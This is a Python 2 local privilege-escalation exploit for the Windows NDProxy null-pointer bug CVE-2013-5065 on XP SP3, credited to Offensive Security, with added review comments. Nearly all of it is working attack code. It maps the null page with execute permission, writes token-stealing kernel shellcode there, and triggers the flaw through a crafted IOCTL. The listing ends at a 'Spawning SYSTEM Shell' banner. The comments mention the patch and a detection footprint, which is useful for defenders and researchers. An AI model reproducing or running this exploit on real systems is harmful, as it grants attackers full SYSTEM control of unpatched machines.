# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
# Original crash ... null pointer dereference
# Access violation - code c0000005 (!!! second chance !!!)
# 00000038 ?? ???
from
ctypes
import
*
from
ctypes.wintypes
import
*
import
os, sys
kernel32
=
windll.kernel32
ntdll
=
windll.ntdll
GENERIC_READ
=
0x80000000
GENERIC_WRITE
=
0x40000000
FILE_SHARE_READ
=
0x00000001
FILE_SHARE_WRITE
=
0x00000002
NULL
=
0x0
OPEN_EXISTING
=
0x3
PROCESS_VM_WRITE
=
0x0020
PROCESS_VM_READ
=
0x0010
MEM_COMMIT
=
0x00001000
MEM_RESERVE
=
0x00002000
MEM_FREE
=
0x00010000
PAGE_EXECUTE_READWRITE
=
0x00000040
PROCESS_ALL_ACCESS
=
2097151
FORMAT_MESSAGE_FROM_SYSTEM
=
0x00001000
baseadd
=
c_int(
0x00000001
)
MEMRES
=
(
0x1000
|
0x2000
)
MEM_DECOMMIT
=
0x4000
PAGEEXE
=
0x00000040
null_size
=
c_int(
0x1000
)
STATUS_SUCCESS
=
0
def log(msg):
    """Write *msg* to stdout followed by a newline.

    Thin wrapper around the Python 2 print statement so that the rest of the
    script has a single place to route its status output through.
    """
    print(msg)
def getLastError():
    """[-] Format GetLastError

    Look up the system message text for the calling thread's last Win32
    error via FormatMessageA and log it. When FormatMessageA itself fails
    (returns 0), log the fixed "[-] Unknown Error" marker instead.
    """
    text = create_string_buffer(2048)
    formatted = kernel32.FormatMessageA(
        FORMAT_MESSAGE_FROM_SYSTEM,
        NULL,
        kernel32.GetLastError(),
        0,
        text,
        sizeof(text),
        NULL,
    )
    # FormatMessageA returns the number of TCHARs stored; 0 means failure.
    log(text.value if formatted else "[-] Unknown Error")
# NOTE: this is Python 2 code (print statements, str used as a raw byte
# buffer); it does not parse under Python 3.
print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
print "[*] Vulnerability found in the wild"
print "[*] Coded by Offensive Security"

# Input buffer for the DeviceIoControl call at the bottom of the script:
# five zeroed dwords, the constant 0x07030125 (little-endian), a zeroed dword,
# the dword 0x34, then zero padding. The resulting string is 92 bytes long,
# although only the first 0x54 (84) bytes are passed as nInBufferSize.
# The page does not document what the driver makes of these fields.
tmp = ("\x00" * 4) * 5 + "\x25\x01\x03\x07" + "\x00" * 4 + "\x34\x00\x00\x00" + "\x00" * (84 - 24)
InBuf = c_char_p(tmp)

# Map memory inside the first page of the current process (0xFFFFFFFF is the
# current-process pseudo-handle; baseadd starts at 1, null_size is 0x1000),
# committed+reserved with an RWX protection. The script's own messages call
# this the "null paged memory" -- it is the classic prerequisite for turning a
# kernel NULL-pointer dereference (see the crash note in the file header) into
# code execution.
# NOTE(review): on failure the script only logs and carries on (no sys.exit,
# unlike the CreateFileA check below), so a later WriteProcessMemory failure is
# the first hard signal that the mapping did not happen.
# NOTE(review): defensive context -- later Windows releases refuse to map the
# null page for user processes by default, and the vulnerability itself was
# patched by Microsoft (MS14-002, early 2014; verify against the advisory).
dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE)
if dwStatus != STATUS_SUCCESS:
    print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
    getLastError()

# Receives the byte count actually written by WriteProcessMemory.
written = c_ulong()
# Machine-code payload that ends up executing in kernel context. The page does
# not annotate it; its length (len(sh)) is only used to size the padding below.
sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
# 0x400-byte image laid over the mapped page: NOPs up to offset 0x38, the
# dword 0x3c at offset 0x38, four more NOPs, `sh` at offset 0x40, then int3
# (0xCC) padding to 0x400. The header comment records the original crash at
# address 0x38, so the dword there looks like the pointer the kernel
# dereferences, steering it onto the NOPs just before `sh` -- inferred from
# the layout, not stated on the page.
sc = "\x90" * 0x38 + "\x3c\x00\x00\x00" + "\x90" * 4 + sh + "\xcc" * (0x400 - 0x3c - 4 - len(sh))
# Copy `sc` into the freshly mapped page (address 1 of the current process).
alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written))
if alloc == 0:
    print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
    getLastError()

# Byte count returned by DeviceIoControl.
dwRetBytes = DWORD(0)
# Device object of the NDProxy driver. From a detection standpoint, an
# unprivileged process opening this device and issuing IOCTLs to it is the
# observable footprint of this technique.
DEVICE_NAME = "\\\\.\\NDProxy"
# Open with no access rights requested, no sharing, default security,
# OPEN_EXISTING and no flags.
hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING, 0, None)
# INVALID_HANDLE_VALUE compared as a signed 32-bit int (ctypes' default
# c_int return type); NOTE(review): this comparison is only reliable for a
# 32-bit interpreter, which matches the XP SP3 target named in the header.
if hdev == -1:
    print "[-] Couldn't open the device... :("
    sys.exit()

# Trigger: IOCTL 0x8fff23cc with InBuf as both input (0x54 bytes) and output
# (0x24 bytes) buffer. No return value or error check on this call.
kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0)
kernel32.CloseHandle(hdev)
# NOTE(review): the listing on this page ends at the banner below; whatever
# actually spawns the shell is not shown here.
print "[+] Spawning SYSTEM Shell..."